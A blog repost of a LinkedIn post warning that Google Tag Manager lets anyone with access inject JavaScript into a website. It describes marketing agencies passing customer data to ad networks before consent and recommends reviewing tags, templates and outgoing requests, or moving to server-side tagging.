Are you handling GTM securely?

Dear Data-Traveller, please note that this is a Linkedin-Remix.

I posted this content already on Linkedin in February 2022, but I want to make sure it doesn´t get lost in the social network abyss.

For your accessibility-experience and also for our own content backup, we repost the original text here.

Have a look, leave a like if you like it, and join the conversation in the comments if this sparks a thought!

Original Post:

Plain Text:

For CTOs and developers: Google Tagmanager is an open script library where everyone with access can inject any piece of JS code to your website without you noticing it.

Let’s imagine Google Tagmanger this one machine, that is running here for ages, seems to submit and receive data, no one really knows what it does. But you are afraid to just turn it off.

I have worked with organizations which had the highest standards when it comes to information technology.

When you wanted to use a new third party software, there was an intense process where a huge checklist of things was tested if this software can be a risk for exploiting customer data for example.

Same with own developed software. There were processes in place that you don’t use any random library from the web but from a vetted and own hosted registry.

High and efficient security. And of course everyone was annoyed by the fact, that you could not easily try out the 20th task management tool next week.

The same kind of company also allowed using a tag management system. And since no one really has looked into how the solution actually works. They created a gateway to security hell’s dimension without knowing it. The keys were handed gracefully to the marketing team who handed it over to their agencies (must be 4-5 at the moment).

And the agencies used this gateway to add script, after script – which are happy to receive any customer and transaction data – to make sure that this data is equally shared with the ad industry.

I can recommend to have a fun afternoon and use the wonderful tool by Dr. Augustine Fou – Ad Fraud Researcher (link in the comment) and check your favourite websites.

This is especially a fun task for us EU people to see what ad networks are classified as business essentials, so you send data to them before any consent.

Just repeating – For CTOs and developers: GTM is a script library where everyone with access can inject any piece of JS code to your website. This can be harmless, but every script can pass on a request to thousands of other servers.

I recommend:

  • check every deployment in GTM with a dev counterpart
  • check the JS code (when just a HTML tag is added)
  • check the template author (when a template is used) – use ony verified templates, in best case from the vendor itself
  • check the requests the tag sends
  • check the requests chain by using a tool like fouanalytics

If this gives you enough of a headache – go for server-side tagmanagement – this limits the stuff significantly.